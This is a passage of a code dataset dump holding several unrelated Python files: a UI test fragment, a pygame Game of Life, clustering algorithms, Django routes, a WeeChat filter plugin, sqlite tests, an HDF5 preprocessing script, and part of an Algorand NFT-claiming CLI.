'输入框提示':\n test.input_by_placeholder(Queryvalue[1], Queryvalue[2])\n elif Queryvalue[0] == '输入框id':\n test.input_by_id(Queryvalue[1], Queryvalue[2])\n elif Queryvalue[0] == '下拉选择框id':\n test.select_option_value(Queryvalue[1], Queryvalue[2])\n elif Queryvalue[0] == '日期输入框id':\n test.select_calendar_byId(Queryvalue[1], Queryvalue[2])\n elif Queryvalue[0] == '日期输入框提示':\n test.select_calendar_byId(Queryvalue[1], Queryvalue[2])\n else:\n print (u'输入参数格式不正确,请检查')\n else:\n print (u'输入参数格式不正确,请检查')\n test.click_button('搜索')\n test.saveScreenshot_Path(testdatas[i]['截图名称'], self.Screenshotfilepath) # 滚动前截屏\n test.scroll_saveScreenshot_Path(testdatas[i]['截图名称'], self.Screenshotfilepath, \"tablelist\") # 滚动后截屏\n time.sleep(3)\n test.close_tab('合同查询')\n def tearDown(self):\n pass\n\nif __name__ == '__main__':\n unittest.main(\n testRunner=xmlrunner.XMLTestRunner(output=sys.path[0] + '/output'),\n # these make sure that some options that are not applicable\n # remain hidden from the help menu.\n failfast=False, buffer=False, catchbreak=False)","sub_path":"Sys_NCP/TestClass/DBCase/CombinationConditionQuery.py","file_name":"CombinationConditionQuery.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"476748241","text":"__author__ = 'kaan'\n\n\nimport pygame, random, os\n\nos.environ['SDL_VIDEO_CENTERED'] = '1'\n\npygame.init()\n\n#Change these\nrect_h = 15\nrect_w = 15\nmargin = 1\nnumber_of_row = 40\nnumber_of_column = 60\n\n\nblack = [0, 0, 0]\nwhite = [255, 255, 255]\nblue = [0, 0, 255]\ngreen = [0, 255, 0]\nred = [255, 0, 0]\n\nclick_sound = pygame.mixer.Sound(\"se3.wav\")\n\nglobal running, start\nrunning = True\nstart = False\n\nfont = pygame.font.Font(None, 25)\ntext1 = font.render(\"Running!\", True, green)\ntext2 = font.render(\"Stand by!\", True, red)\n\nglobal text\ntext = text2\n\nsize = [(rect_w + margin) * number_of_column + margin, (rect_h + margin) * number_of_row + margin]\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Game Of Life || s : start/stop || c : clear || kaanctn\")\nclock = pygame.time.Clock()\n\ngrid = []\nglobal dead_list\ndead_list = []\nglobal born_list\nborn_list = []\n\n\ndef create_matrix():\n for row in range(number_of_row + 2):\n grid.append([])\n for column in range(number_of_column + 2):\n grid[row].append(0)\n\n\ndef draw():\n for row in range(number_of_row):\n for column in range(number_of_column):\n color = white\n if grid[row + 1][column + 1] == 1:\n color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n pygame.draw.rect(screen, color, [(margin + rect_w) * column + margin, (margin + rect_h) * row + margin, rect_w, rect_h])\n\n\ndef mouse_click():\n pos = pygame.mouse.get_pos()\n column = pos[0] // (rect_w + margin) + 1\n row = pos[1] // (rect_h + margin) + 1\n\n if row <= number_of_row and row > 0 and column > 0 and column <= number_of_column:\n #print \"clicked : \", row, column\n if grid[row][column] == 0:\n grid[row][column] = 1\n else:\n grid[row][column] = 0\n click_sound.play()\n\n\ndef deadlist():\n for row in range(number_of_row):\n for column in range(number_of_column):\n if grid[row + 1][column + 1] == 1:\n counter = grid[row][column] + grid[row][column + 1] + grid[row][column + 2] + grid[row + 1][column] + grid[row + 1][column + 2] + grid[row + 2][column] + grid[row + 2][column + 1] + grid[row + 2][column + 2]\n if counter < 2 or counter > 3:\n dead_list.append((row + 1, column + 1))\n\n\ndef bornList():\n for row in range(number_of_row):\n for column in range(number_of_column):\n if grid[row + 1][column + 1] == 0:\n counter = grid[row][column] + grid[row][column + 1] + grid[row][column + 2] + grid[row + 1][column] + grid[row + 1][column + 2] + grid[row + 2][column] + grid[row + 2][column + 1] + grid[row + 2][column + 2]\n if counter == 3:\n born_list.append((row + 1, column + 1))\n\n\ndef apply_changes():\n global dead_list, born_list\n\n for i, j in dead_list:\n grid[i][j] = 0\n #print \"killed at: \", i, j\n\n for i, j in born_list:\n grid[i][j] = 1\n #print \"created at: \", i, j\n\n dead_list = []\n born_list = []\n\n\ndef clear():\n global born_list\n born_list = []\n global dead_list\n dead_list = []\n for row in range(number_of_row):\n for column in range(number_of_column):\n grid[row + 1][column + 1] = 0\n\n\ndef main():\n i = 0\n c = font.render(str(i), True, red)\n #asd = number_of_column * (rect_w + margin) - 50\n create_matrix()\n global running, start, text\n\n while running:\n clock.tick(10)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n mouse_click()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_s:\n if start == False:\n start = True\n text = text1\n else:\n start = False\n text = text2\n #print \"running : \", start\n if event.key == pygame.K_c:\n clear()\n if event.key == pygame.K_r:\n pass #random_create()\n\n if start:\n c = font.render(str(i), True, red)\n deadlist()\n bornList()\n apply_changes()\n i = i + 1\n\n screen.fill(black)\n # DO SOMETHING\n draw()\n screen.blit(c, [0, 15])\n screen.blit(text, [0, 0])\n pygame.display.flip()\n pygame.quit()\n\nif __name__ == '__main__':\n main()\n","sub_path":"gol.py","file_name":"gol.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"193264397","text":"#!/usr/bin/env python\r\n'''\r\nProject 3 - Closest pairs and Clustering algorithms\r\nImplementation of two clustering algorithms - \"HierarchicalClustering\"\r\nand \"KMeansClustering\"\r\nImplementation of two algorithms for computing closest pair -\r\n\"slow_closest_pairs\" and \"fast_closest_pair\"\r\n'''\r\n\r\nimport math\r\nfrom alg_cluster import Cluster\r\n\r\n################################################################\r\n# Implemtation of two algorithms for computing closest pair -\r\n# \"slow_closest_pairs\" and \"fast_closest_pair\"\r\n################################################################\r\n\r\n\r\ndef pair_distance(cluster_list, idx1, idx2):\r\n \"\"\"\r\n Helper function to compute Euclidean distance between two clusters\r\n in cluster_list with indices idx1 and idx2\r\n\r\n Returns tuple (dist, idx1, idx2) with idx1 < idx2 where dist is\r\n distance between cluster_list[idx1] and cluster_list[idx2]\r\n \"\"\"\r\n return (cluster_list[idx1].distance(cluster_list[idx2]), min(idx1, idx2),\r\n max(idx1, idx2))\r\n\r\n\r\ndef slow_closest_pairs(cluster_list):\r\n \"\"\"\r\n Compute the set of closest pairs of clusters in list of clusters\r\n using O(n^2) all pairs algorithm (brute-force)\r\n\r\n Returns the set of all tuples of the form (dist, idx1, idx2)\r\n where the cluster_list[idx1] and cluster_list[idx2] have\r\n minimum distance dist.\r\n \"\"\"\r\n dmin = [(float('inf'), -1, -1)]\r\n for idx in range(len(cluster_list) - 1):\r\n for jdx in range(idx + 1, len(cluster_list)):\r\n dist, idx1, idx2 = pair_distance(cluster_list, idx, jdx)\r\n # check if this is min distance\r\n if dist < dmin[0][0]:\r\n dmin = [(dist, idx1, idx2)]\r\n\r\n elif dist == dmin[0][0]:\r\n dmin.append((dist, idx1, idx2))\r\n\r\n return set(dmin)\r\n\r\n\r\ndef fast_closest_pair(cluster_list):\r\n \"\"\"\r\n Compute a closest pair of clusters in cluster_list\r\n using O(n log(n)) divide and conquer algorithm\r\n\r\n Returns a tuple (distance, idx1, idx2) with idx1 < idx 2 where\r\n cluster_list[idx1] and cluster_list[idx2]\r\n have the smallest distance dist of any pair of clusters\r\n \"\"\"\r\n\r\n # x-cordinate of every cluster's centre alongwith cluster id\r\n x_cord_id = [(item.horiz_center(), idx)\r\n for idx, item in enumerate(cluster_list)]\r\n x_cord_id.sort()\r\n # clusters sorted as per their x-coordinates\r\n x_sorted_clusters = [item[1] for item in x_cord_id]\r\n\r\n # y-cordinate of every cluster's centre alongwith cluster id\r\n y_cord_id = [(item.vert_center(), idx)\r\n for idx, item in enumerate(cluster_list)]\r\n y_cord_id.sort()\r\n # clusters sorted as per their y-coordinates\r\n y_sorted_clusters = [item[1] for item in y_cord_id]\r\n answer = fast_helper(cluster_list, x_sorted_clusters, y_sorted_clusters)\r\n return (answer[0], min(answer[1:]), max(answer[1:]))\r\n\r\n\r\ndef fast_helper(cluster_list, horiz_order, vert_order):\r\n \"\"\"\r\n Divide and conquer method for computing distance between\r\n closest pair of points Running time is O(n * log(n))\r\n\r\n horiz_order and vert_order are lists of indices for clusters\r\n ordered horizontally and vertically\r\n\r\n Returns a tuple (distance, idx1, idx2) with idx1 < idx 2 where\r\n cluster_list[idx1] and cluster_list[idx2]\r\n have the smallest distance dist of any pair of clusters\r\n \"\"\"\r\n\r\n # base case\r\n if len(horiz_order) <= 3:\r\n cluster = []\r\n for idx in horiz_order:\r\n cluster.append(cluster_list[idx])\r\n result = slow_closest_pairs(cluster).pop()\r\n # get the original index of the cluster object\r\n return (result[0], horiz_order[result[1]], horiz_order[result[2]])\r\n\r\n else:\r\n # divide phase\r\n\r\n # number of points in each half\r\n num = len(horiz_order) / 2\r\n # horizontal coordinate for vertical dividing line\r\n mid = (cluster_list[horiz_order[num]].horiz_center() +\r\n cluster_list[horiz_order[num - 1]].horiz_center()) / 2\r\n horiz_left = [horiz_order[idx] for idx in range(num)]\r\n horiz_right = [horiz_order[idx]\r\n for idx in range(num, len(horiz_order))]\r\n\r\n # copy to vert_left, in order, the elements of vert_order\r\n # that are elements of horiz_left\r\n # copy to vert_right, in order, the elements of vert_order\r\n # that are elements of horiz_right\r\n vert_left = []\r\n vert_right = []\r\n # convert to set for constant time membership check\r\n for idx in vert_order:\r\n if idx in set(horiz_left):\r\n vert_left.append(idx)\r\n else:\r\n vert_right.append(idx)\r\n\r\n answer_left = fast_helper(cluster_list, horiz_left, vert_left)\r\n answer_right = fast_helper(cluster_list, horiz_right, vert_right)\r\n\r\n dist1 = (answer_left[0], min(answer_left[1:]), max(answer_left[1:]))\r\n dist2 = (answer_right[0], min(answer_right[1:]), max(answer_right[1:]))\r\n\r\n d_min = dist1 if dist1[0] < dist2[0] else dist2\r\n\r\n # conquer phase\r\n strip = filter(lambda x: math.fabs(cluster_list[x].horiz_center() - mid)\r\n < d_min[0], vert_order)\r\n for idx in range(len(strip) - 1):\r\n for jdx in range(idx + 1, min(idx + 3, len(strip) - 1) + 1):\r\n res = pair_distance(cluster_list, strip[idx], strip[jdx])\r\n d_min = d_min if d_min[0] < res[0] else res\r\n return d_min\r\n\r\n\r\n###########################################################################\r\n# Implementation of two clustering algorithms - \"HierarchicalClustering\"\r\n# and \"KMeansClustering\"\r\n###########################################################################\r\n\r\ndef hierarchical_clustering(cluster_list, num_clusters):\r\n '''\r\n Takes a list of Cluster objects and applies hierarchical clustering\r\n Returns a list of clusters of desired number\r\n '''\r\n while len(cluster_list) > num_clusters:\r\n # find the closest two clusters\r\n #res = slow_closest_pairs(cluster_list).pop()\r\n res = fast_closest_pair(cluster_list)\r\n # merge clusters into one\r\n cluster_list[res[1]].merge_clusters(cluster_list[res[2]])\r\n # since already merged\r\n cluster_list.pop(res[2])\r\n return cluster_list\r\n\r\n\r\ndef kmeans_clustering(cluster_list, num_clusters, num_iterations):\r\n '''\r\n Takes a list of Cluster objects and applies kmeans clustering\r\n Returns a list of clusters of desired number after specific\r\n number of operations\r\n '''\r\n # initialize num_clusters centers\r\n # use the centers of those clusters which have the largest populations\r\n populations = [(item.total_population(), idx)\r\n for idx, item in enumerate(cluster_list)]\r\n populations.sort()\r\n centers = []\r\n populations = populations[-num_clusters:]\r\n for item in populations:\r\n centers.append((cluster_list[item[1]].horiz_center(),\r\n cluster_list[item[1]].vert_center()))\r\n\r\n final_clusters = []\r\n #for itr in range(num_iterations):\r\n while num_iterations > 0:\r\n # initialize empty clusters\r\n clusters = [Cluster(set(), j[0], j[1], 0, 0) for j in centers]\r\n copy_clusters = [item.copy() for item in clusters]\r\n\r\n # find distance of clusters from newly created clusters\r\n for clus1 in cluster_list:\r\n dmin = (float('inf'), None)\r\n for idx, clus2 in enumerate(clusters):\r\n dist = clus1.distance(clus2)\r\n dmin = dmin if dmin[0] < dist else (dist, idx)\r\n # merge the cluster to its closet pair\r\n copy_clusters[dmin[1]].merge_clusters(clus1)\r\n\r\n # update the centers of the desired clusters\r\n centers = []\r\n for item in copy_clusters:\r\n centers.append((item.horiz_center(), item.vert_center()))\r\n final_clusters = list(copy_clusters)\r\n num_iterations -= 1\r\n\r\n return final_clusters\r\n","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":8024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"214951647","text":"from django.conf.urls.defaults import *\nfrom django.views.generic.simple import direct_to_template\n\n\n\nurlpatterns = patterns(\"\",\n #url(r\"^$\", direct_to_template, {\"template\": \"broadcast/familypage.html\"}, name=\"broadcast\"),\n url(r\"^familypage/$\", direct_to_template, {\"template\": \"broadcast/familypage.html\"}, name=\"familypage\"),\n url(r\"^view_status/$\", \"broadcast.views.view_patient_status\", name=\"view_status\"),\n url(r\"^form_kinship/$\", \"broadcast.views.form_kinship\", name=\"form_kinship\"),\n url(r\"^find_patient/$\", \"broadcast.views.show_all_patients\", name=\"find_patient\"),\n)","sub_path":"apps/broadcast/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"333089259","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport weechat as w\n\nw.register(\"show-only\",\"\",\"\",\"\",\"Shows messages only from one nick in current buffer\",\"\",\"\")\n\nfilters = []\n\ndef show_only(data, buffer, args):\n if not args:\n return show_all(data, buffer, args)\n nick = args\n filters.append(nick)\n bname = w.buffer_get_string(buffer, \"full_name\")\n command = \"/filter add \" + nick + \" \" + bname + \" * \" + \"!\"+nick+\"\\\\t\"\n w.prnt(\"\",command)\n w.command(\"\",command)\n return w.WEECHAT_RC_OK\n\ndef show_all(data, buffer, args):\n if not filters:\n return w.WEECHAT_RC_OK\n nick = filters.pop()\n bname = w.buffer_get_string(buffer, \"full_name\")\n command = \"/filter del \" + nick\n w.prnt(\"\",command)\n w.command(\"\",command)\n return w.WEECHAT_RC_OK\n\nw.hook_command(\"show_only\",\"\",\"\",\"\",\"\",\"show_only\", \"\")\nw.hook_command(\"show_all\",\"\",\"\",\"\",\"\",\"show_all\", \"\")\n","sub_path":"python/show_only.py","file_name":"show_only.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"14428527","text":"import base\n\nclass TestBasicConnection(base.Base):\n '''Test basic functionality about connection \n \n In all the tests, *_w refers to sqlite3_wrapper stuff, and *_s refers to\n sqlite3 module stuff'''\n\n def setUp(self):\n self._sql = '/*mycomment*/select * from recipe order by name'\n super(TestBasicConnection, self).setUp()\n\n def test_execute(self):\n con_w, con_s = self._get_cons()\n cur_w = con_w.execute(self._sql)\n cur_s = con_s.execute(self._sql)\n data = [row for row in cur_w]\n [self.assertTrue(dict(row) in data) for row in cur_s]\n self._close_cursors(cur_w, cur_s)\n\n def test_executemany(self):\n con_w, con_s = self._get_cons()\n cur_w = con_w.executemany(self._sql, [])\n cur_s = con_s.executemany(self._sql, [])\n data = [row for row in cur_w]\n [self.assertTrue(dict(row) in data) for row in cur_s]\n self._close_cursors(cur_w, cur_s)\n","sub_path":"tests/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"70174492","text":"# hdf5_data_multichannel.py\n# --- details --- (option)\n# create hdf5 data multichannel with coregistration (w prefix) for training\n\n# --- version ---- (option)\n# sample_path\n# label_path\n# hdf5_path\n# sample_ext\n# label_ext\n# --- Input ---\n\n# --- output ----\n\n# --- ref ---\n\n# --- note ---(option)\n\n# by Lance Liu\n\n\nimport h5py\nimport os\nimport nibabel as nib\nimport numpy as np\nimport glob\nfrom matplotlib import pyplot as plt\n\n# n_sample = 35\nn_sample = (25, 35)\n# sample_path = '../IXI_preprocessed_387/imgs/'\nsample_path = ['../IXI_train_val_124/',\n '../IXI_T2_train_val_124/',\n '../IXI_PD_train_val_124/']\nlabel_path = '../IXI_train_val_label_124/'\nhdf5_path = 'resources/train_val_t1t2pd_hdf5'\nsample_ext = '.nii'\nlabel_ext = '.skull.label.nii'\n\nsamplelist = []\nfor sample_path_single in sample_path:\n samplepathlist = glob.glob(sample_path_single+'w*'+sample_ext)\n samplelist.append([i.split('/')[-1] for i in samplepathlist])\n\nlabelpathlist = glob.glob(label_path+'w*'+label_ext)\nlabellist = [i.split('/')[-1] for i in labelpathlist]\nlabellist\n\n# for i in range(n_sample):\nfor i in range(*n_sample):\n\n # assert samplelist[0][i][:-10] == samplelist[1][i][:-10] == samplelist[2][i][:-10], \\\n # \"only processed \"+str(i)+\" samples, error occurs: \" + \\\n # samplelist[0][i]+\" does not exist in all modalities\"\n\n sample_name = labellist[i].split('.')[0]\n volume = []\n for jj in range(len(sample_path)):\n sample_fullpath = os.path.join(sample_path[jj], samplelist[jj][i])\n sample = nib.load(sample_fullpath)\n # volume1 = np.swapaxes(sample.get_fdata(), 0, 2)\n # volume1 = np.fliplr(np.swapaxes(volume1, 1, 2))\n # volume.append(volume1)\n sample = sample.get_fdata()\n volume.append(sample)\n volume = np.stack(volume)\n\n label_name_ext = labellist[i]\n label_fullpath = os.path.join(label_path, label_name_ext)\n label = nib.load(label_fullpath)\n label = label.get_fdata()\n label[label == 16] = 1\n label[label == 17] = 2\n label[label == 18] = 3\n label[label == 19] = 4\n type(label)\n\n volume = volume.astype(np.float32)\n label = label.astype(np.int32)\n label.dtype\n volume.dtype\n plt.imshow(volume[1, :, :, 80])\n plt.imshow(label[:, :, 80])\n label.max(0).max(0).max(0)\n label.min(0).min(0).min(0)\n\n volume.shape\n label.shape\n save_path = os.path.join(hdf5_path, sample_name+'.h5')\n\n hf = h5py.File(save_path, 'w')\n hf.create_dataset('raw', data=volume, chunks=True, compression='gzip')\n hf.create_dataset('label', data=label, chunks=True, compression='gzip')\n hf.close()\n","sub_path":"hdf5_dataset_multichannel_T2_DTI.py","file_name":"hdf5_dataset_multichannel_T2_DTI.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"622307324","text":"\"\"\"\nAlgoRealm, only generous heart will ever rule over Algorand. (by cusma)\n\nUsage:\n algorealm.py poem\n algorealm.py dynasty \n algorealm.py claim-crown \n algorealm.py claim-sceptre \n algorealm.py claim-card \n algorealm.py buy-order [--msg]\n algorealm.py verify-order \n algorealm.py sell-card \n algorealm.py [--help]\n\nCommands:\n poem AlgoRealm's poem.\n dynasty Print the glorious dynasty of AlgoRealm's Majesties.\n claim-crown Claim the Crown of Entropy, become the Randomic Majesty of Algorand.\n claim-sceptre Claim the Sceptre of Proof, become the Verifiable Majesty of Algorand.\n claim-card Brake the spell and claim the AlgoRealm Card by AlgoWorld.\n buy-order Place an order for the AlgoRealm Card.\n review-order Review the partially signed buy order.\n sell-card Sell the AlgoRealm Card (paying a 10% royalty).\n\nOptions:\n -m --msg Notify the Seller about your buy order on-chain.\n -h --help\n\"\"\"\n\nimport math\nimport sys\nimport time\nimport base64\nimport msgpack\nimport traceback\nimport dataclasses\n\nfrom docopt import docopt\n\nfrom algosdk.v2client import algod, indexer\nfrom algosdk.error import AlgodHTTPError, IndexerHTTPError\nfrom algosdk.future import transaction\nfrom algosdk import mnemonic, account, util\n\n\n@dataclasses.dataclass\nclass Account:\n address: str\n private_key: str\n lsig: transaction.LogicSig = None\n\n def mnemonic(self) -> str:\n return mnemonic.from_private_key(self.private_key)\n\n def is_lsig(self):\n return not self.private_key and self.lsig\n\n @classmethod\n def create_account(cls):\n private_key, address = account.generate_account()\n return cls(private_key=private_key, address=address)\n\n\n# --- Config\nMAX_CONNECTION_ATTEMPTS = 10\nCONNECTION_ATTEMPT_DELAY_SEC = 2\n\nINDEXER_ADDRESS = \"https://mainnet-algorand.api.purestake.io/idx2\"\nALGOD_ADDRESS = \"https://mainnet-algorand.api.purestake.io/ps2\"\n\nREWARDS_POOL = '737777777777777777777777777777777777777777777777777UFEJ2CI'\n\nALGOREALM_FIRST_BLOCK = 13578170\nALGOREALM_APP_ID = 137491307\nCROWN_ID = 137493252\nSCEPTRE_ID = 137494385\n\nALGOREALM_LAW_BYTECODE = \\\n 'AiAIAwbr5sdBAQSE9sdB8f7HQegHJgEg/v////////////////////////////////////' \\\n '////8yBCISMwAQIxIzABgkEhAQMwEQJRIzAQAzAAASEDMBBygSEBAzAhAhBBIzAhQzAQAS' \\\n 'EDMCESEFEjMCESEGEhEQMwISJRIQMwIBIQcOEDMCFTIDEhAzAiAyAxIQEA=='\n\nALGOREALM_LAW_LSIG = transaction.LogicSig(\n base64.decodebytes(ALGOREALM_LAW_BYTECODE.encode())\n)\n\nALGOREALM_LAW = Account(\n address=ALGOREALM_LAW_LSIG.address(),\n private_key=None,\n lsig=ALGOREALM_LAW_LSIG,\n)\n\nALGOREALM_CARD_FIRST_BLOCK = 16250000\nROYALTY_PERC = 5\nROYALTY_COLLECTOR_1 = Account(\n address='H7N65NZIWBOKFDSRNPLLDGN72HVFKXT4RRSY7M66B6Y2PFLQFKLPLHU5JU',\n private_key=''\n)\nROYALTY_COLLECTOR_2 = Account(\n address='2PDM3E7WLVPMEKCCMNTHM3FCZNZM4CSJQUOC4SWHMFPAR3N4NXBLCQKHPE',\n private_key=''\n)\nASA_STATE_OBSERVER_APP_ID = 321230622\nCARD_ID = 321172366\nCARD_CONTRACT_BYTECODE = \\\n 'AyAOAQMGBOgHnq6WmQGE9sdB8f7HQQVkjueSmQGQ6d8HAM7i0wcmAwtBc2FBbW91bnRFcS' \\\n 'A/2+63KLBcoo5Ra9axmb/R6lVefIxlj7PeD7GnlXAqliDTxs2T9l1ewihCY2Z2bKLLcs4K' \\\n 'SYUcLkrHYV4I7bxtwjIEIhJAAaIyBCMSQAD4MgQkEkAAAQAzABAkEjMBECQSEDMCECISED' \\\n 'MDECISEDMEECISEDMFECUSEDMFASEEDhAzBSAyAxIQMwUVMgMSEDMAGCEFEjcAGgAoEhA3' \\\n 'ABwBMwAAEhA3ADAAIQYSEDcAGgEiFhIQEDMBGCEFEjcBGgAoEhA3ARwBMwEAEhA3ATAAIQ' \\\n 'cSEDcBGgEiFhIQEDMAADMCBxIQMwEAMwIHEhAzAgAzBRQSEDMDADMCBxIQMwMHKRIQMwQA' \\\n 'MwIHEhAzBAcqEhAzAwgzBAgSEDMDCDMCCCEICyEJCg8QMwURIQoSEDMFEiISEDMFEzMCBx' \\\n 'IQMwUUMwIAEhBCANczABAkEjMBECQSEDMCECUSEDMCASEEDhAzAiAyAxIQMwIVMgMSEDMA' \\\n 'GCEFEjcAGgAoEhA3ABwBMwAAEhA3ADAAIQYSEDcAGgEiFhIQEDMBGCEFEjcBGgAoEhA3AR' \\\n 'wBMwEAEhA3ATAAIQcSEDcBGgEiFhIQEDMAADMCFBIQMwEAMwIUEhAzAgIhCw0QMwIRIQoS' \\\n 'EDMCEiISEDMCADMCExIQQgA0MRAlEjEBIQQOEDETMgMSEDEVMgMSEDEgMgMSEDERIQoSED' \\\n 'ESIQwSEDEAMRQSEDEEIQ0MEA=='\n\nCARD_CONTRACT_LSIG = transaction.LogicSig(\n base64.decodebytes(CARD_CONTRACT_BYTECODE.encode())\n)\n\nCARD_CONTRACT = Account(\n address=CARD_CONTRACT_LSIG.address(),\n private_key=None,\n lsig=CARD_CONTRACT_LSIG,\n)\n\n\ndef wait_for_confirmation(client: algod.AlgodClient, txid: str):\n \"\"\"\n Utility function to wait until the transaction is confirmed before\n proceeding.\n \"\"\"\n last_round = client.status().get(\"last-round\")\n txinfo = client.pending_transaction_info(txid)\n\n while not txinfo.get(\"confirmed-round\", -1) > 0:\n print(f\"Waiting for transaction {txid} confirmation.\")\n last_round += 1\n client.status_after_block(last_round)\n txinfo = client.pending_transaction_info(txid)\n\n print(\n f\"Transaction {txid} confirmed in round {txinfo.get('confirmed-round')}.\")\n return txinfo\n\n\ndef sign(account: Account, txn: transaction.Transaction):\n if account.is_lsig():\n return transaction.LogicSigTransaction(txn, account.lsig)\n else:\n assert account.private_key\n return txn.sign(account.private_key)\n\n\ndef sign_send_wait(\n algod_client: algod.AlgodClient,\n account: Account,\n txn):\n \"\"\"Sign a transaction, submit it, and wait for its confirmation.\"\"\"\n signed_txn = sign(account, txn)\n tx_id = signed_txn.transaction.get_txid()\n algod_client.send_transactions([signed_txn])\n wait_for_confirmation(algod_client, tx_id)\n return algod_client.pending_transaction_info(tx_id)\n\n\ndef group_and_sign(signers, txns):\n assert len(signers) == len(txns)\n\n signed_group = []\n gid = transaction.calculate_group_id(txns)\n\n for signer, t in zip(signers, txns):\n t.group = gid\n signed_group.append(sign(signer, t))\n\n return signed_group\n\n\ndef search_algorelm_calls(indexer_client: indexer.IndexerClient):\n nexttoken = \"\"\n numtx = 1\n calls = []\n while numtx > 0:\n result = indexer_client.search_transactions(\n limit=1000,\n next_page=nexttoken,\n application_id=ALGOREALM_APP_ID,\n min_round=ALGOREALM_FIRST_BLOCK,\n )\n calls += result['transactions']\n numtx = len(result['transactions'])\n if numtx > 0:\n # pointer to the next chunk of requests\n nexttoken = result['next-token']\n return calls\n\n\ndef search_algorelm_nft_txns(\n indexer_client: indexer.IndexerClient,\n nft_id: int\n):\n nexttoken = \"\"\n numtx = 1\n txns = []\n while numtx > 0:\n result = indexer_client.search_asset_transactions(\n asset_id=nft_id,\n limit=1000,\n next_page=nexttoken,\n txn_type='axfer',\n min_round=ALGOREALM_FIRST_BLOCK,\n )\n txns += result['transactions']\n numtx = len(result['transactions'])\n if numtx > 0:\n # pointer to the next chunk of requests\n nexttoken = result['next-token']\n return txns\n\n\ndef history(indexer_client: indexer.IndexerClient):\n attempts = 1\n algorealm_calls = None\n while attempts <= MAX_CONNECTION_ATTEMPTS:\n try:\n algorealm_calls = search_algorelm_calls(indexer_client)\n break\n except IndexerHTTPError:\n print(f'Indexer Client connection attempt '\n f'{attempts}/{MAX_CONNECTION_ATTEMPTS}')\n print('Trying to contact Indexer Client again...')\n time.sleep(CONNECTION_ATTEMPT_DELAY_SEC)\n finally:\n attempts += 1\n if not algorealm_calls:\n quit(\"❌ Unable to connect to Indexer Client. Check your API token!\")\n\n claims_history = []\n name = ''\n claim = ''\n for call in algorealm_calls:\n call_args = call['application-transaction']['application-args']\n # Check is an NFT claim call\n if len(call_args) == 2:\n block = call['confirmed-round']\n nft = call_args[0].encode()\n donation = call['global-state-delta'][0]['value']['uint']\n # Check is a different claimer (2 elements in the state delta)\n if len(call['global-state-delta']) == 2:\n name = base64.b64decode(\n call['global-state-delta'][1]['value']['bytes']).decode()\n if nft == base64.b64encode(b\"Crown\"):\n claim = f\"👑 {name} claimed the Crown of Entropy\\n\" \\\n f\"on Block: {block} donating: {donation} microALGOs \" \\\n f\"to the Rewards Pool.\\n\\n\"\n elif nft == base64.b64encode(b\"Sceptre\"):\n claim = f\"🪄 {name} claimed the Sceptre of Proof\\n\" \\\n f\"on Block: {block} donating: {donation} microALGOs \" \\\n f\"to the Rewards Pool.\\n\\n\"\n else:\n pass\n\n claims_history += [claim]\n\n else:\n pass\n\n return claims_history\n\n\ndef current_owner(indexer_client: indexer.IndexerClient, nft_id: int):\n attempts = 1\n nft_txns = None\n while attempts <= MAX_CONNECTION_ATTEMPTS:\n try:\n nft_txns = search_algorelm_nft_txns(indexer_client, nft_id)\n break\n except IndexerHTTPError:\n print(f'Indexer Client connection attempt '\n f'{attempts}/{MAX_CONNECTION_ATTEMPTS}')\n print('Trying to contact Indexer Client again...')\n time.sleep(CONNECTION_ATTEMPT_DELAY_SEC)\n finally:\n attempts += 1\n if not nft_txns:\n quit(\"❌ Unable to connect to Indexer Client. Check your API token!\")\n\n nft_txns.reverse()\n for txn in nft_txns:\n if txn['asset-transfer-transaction']['amount'] == 1:\n return txn['asset-transfer-transaction']['receiver']\n\n\ndef opt_in(\n algod_client: algod.AlgodClient,\n user: Account,\n nft_id: int,\n):\n nft_name = algod_client.asset_info(nft_id)['params']['name']\n optin = ''\n while not optin:\n optin = str(input(\n f\"Do you want to opt-in the {nft_name} (ID: {nft_id})? (Y/n) \"\n ))\n print(\"\")\n if optin.lower() == 'y':\n params = algod_client.suggested_params()\n\n opt_in_txn = transaction.AssetOptInTxn(\n sender=user.address,\n sp=params,\n index=nft_id,\n )\n return sign_send_wait(algod_client, user, opt_in_txn)\n\n elif optin.lower() == 'n':\n return\n else:\n optin = ''\n\n\ndef claim_nft(\n algod_client: algod.AlgodClient,\n indexer_client: indexer.IndexerClient,\n claimer: Account,\n claim_arg: str,\n new_majesty: str,\n donation_amount: int,\n nft_id: int,\n):\n params = algod_client.suggested_params()\n\n claim_txn = transaction.ApplicationNoOpTxn(\n sender=claimer.address,\n sp=params,\n index=ALGOREALM_APP_ID,\n app_args=[claim_arg.encode(), new_majesty.encode()]\n )\n\n donation_txn = transaction.PaymentTxn(\n sender=claimer.address,\n sp=params,\n receiver=REWARDS_POOL,\n amt=donation_amount,\n )\n\n nft_transfer = transaction.AssetTransferTxn(\n sender=ALGOREALM_LAW.address,\n sp=params,\n receiver=claimer.address,\n amt=1,\n index=nft_id,\n revocation_target=current_owner(indexer_client, nft_id),\n )\n\n signed_group = group_and_sign(\n [claimer, claimer, ALGOREALM_LAW],\n [claim_txn, donation_txn, nft_transfer],\n )\n\n nft_name = algod_client.asset_info(nft_id)['params']['name']\n\n print(f\"Claiming the {nft_name} as {new_majesty}, \"\n f\"donating {donation_amount / 